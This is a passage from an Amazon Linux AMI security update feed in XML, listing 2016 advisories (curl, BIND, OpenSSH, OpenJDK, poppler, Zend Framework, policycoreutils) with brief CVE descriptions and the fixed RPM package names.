arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.38-1.65.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-765</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-765: important priority package update for policycoreutils</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7545:
It was found that the sandbox tool provided in policycoreutils was vulnerable to a TIOCSTI ioctl attack. A specially crafted program executed via the sandbox command could use this flaw to execute arbitrary commands in the context of the parent bash, escaping the sandbox.
1378577:
CVE-2016-7545 policycoreutils: SELinux sandbox escape via TIOCSTI ioctl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7545" title="" id="CVE-2016-7545" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="policycoreutils-python" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-python-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-restorecond" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-restorecond-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-debuginfo" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-debuginfo-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-newrole" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-newrole-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-debuginfo" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-debuginfo-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils-restorecond" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-restorecond-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils-newrole" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-newrole-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils-python" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-python-2.1.12-5.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-766</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-766: medium priority package update for curl</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8624:
1388390:
CVE-2016-8624 curl: Invalid URL parsing with '#'
CVE-2016-8623:
1388388:
CVE-2016-8623 curl: Use-after-free via shared cookies
CVE-2016-8622:
1388386:
CVE-2016-8622 curl: URL unescape heap overflow via integer truncation
CVE-2016-8621:
1388385:
CVE-2016-8621 curl: curl_getdate out-of-bounds read
CVE-2016-8620:
1388382:
CVE-2016-8620 curl: Glob parser write/read out of bounds
CVE-2016-8619:
1388379:
CVE-2016-8619 curl: Double-free in krb5 code
CVE-2016-8618:
1388378:
CVE-2016-8618 curl: Double-free in curl_maprintf
CVE-2016-8617:
1388377:
CVE-2016-8617 curl: Out-of-bounds write via unchecked multiplication
CVE-2016-8616:
1388371:
CVE-2016-8616 curl: Case insensitive password comparison
CVE-2016-8615:
1388370:
CVE-2016-8615 curl: Cookie injection for other servers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8615" title="" id="CVE-2016-8615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8616" title="" id="CVE-2016-8616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8617" title="" id="CVE-2016-8617" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8618" title="" id="CVE-2016-8618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8619" title="" id="CVE-2016-8619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8620" title="" id="CVE-2016-8620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8621" title="" id="CVE-2016-8621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8622" title="" id="CVE-2016-8622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8623" title="" id="CVE-2016-8623" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8624" title="" id="CVE-2016-8624" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.47.1-9.66.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.47.1-9.66.amzn1.i686.rpm</filename></package><package name="curl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.47.1-9.66.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.47.1-9.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-767</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-767: medium priority package update for php-ZendFramework</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6233:
The implementation of ORDER BY and GROUP BY in Zend_Db_Select was discovered to be vulnerable to SQL injection.
CVE-2016-4861:
The implementation of ORDER BY and GROUP BY in Zend_Db_Select was discovered to be vulnerable to SQL injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4861" title="" id="CVE-2016-4861" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6233" title="" id="CVE-2016-6233" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.20-1.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-768</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-768: important priority package update for bind</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8864:
A denial of service flaw was found in the way BIND handled responses containing a DNAME answer. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
1389652:
CVE-2016-8864 bind: assertion failure while handling responses containing a DNAME answer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8864" title="" id="CVE-2016-8864" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-769</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-769: medium priority package update for poppler</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8868:
A heap-buffer overflow was found in the poppler library. An attacker could create a malicious PDF file that would cause applications that use poppler (such as Evince) to crash or, potentially, execute arbitrary code when opened.
1326225:
CVE-2015-8868 poppler: heap buffer overflow in ExponentialFunction
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8868" title="" id="CVE-2015-8868" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-debuginfo" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.22.5-6.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-770</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-770: medium priority package update for openssh</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8325:
It was discovered that the OpenSSH sshd daemon fetched PAM environment settings before running the login program. In configurations with UseLogin=yes and the pam_env PAM module configured to read user environment settings, a local user could use this flaw to execute arbitrary code as root.
1328012:
CVE-2015-8325 openssh: privilege escalation via user's PAM environment and UseLogin=yes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8325" title="" id="CVE-2015-8325" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.9.3" release="9.31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.31.62.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.31.62.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-31.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-771</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-771: important priority package update for java-1.7.0-openjdk</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5597:
A flaw was found in the way the Networking component of OpenJDK handled HTTP proxy authentication. A Java application could possibly expose HTTPS server authentication credentials via a plain text network connection to an HTTP proxy if proxy asked for authentication.
1386103:
CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838)
CVE-2016-5582:
It was discovered that the Hotspot component of OpenJDK did not properly check arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt virtual machine&#039;s memory and completely bypass Java sandbox restrictions.
1385402:
CVE-2016-5582 OpenJDK: incomplete type checks of System.arraycopy arguments (Hotspot, 8160591)
CVE-2016-5573:
It was discovered that the Hotspot component of OpenJDK did not properly check received Java Debug Wire Protocol (JDWP) packets. An attacker could possibly use this flaw to send debugging commands to a Java program running with debugging enabled if they could make victim&#039;s browser send HTTP requests to the JDWP port of the debugged application.
1385544:
CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519)
CVE-2016-5554:
A flaw was found in the way the JMX component of OpenJDK handled classloaders. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
1385714:
CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify content of the JAR file that used weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5554" title="" id="CVE-2016-5554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5573" title="" id="CVE-2016-5573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5582" title="" id="CVE-2016-5582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5597" title="" id="CVE-2016-5597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.121-2.6.8.1.69.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" 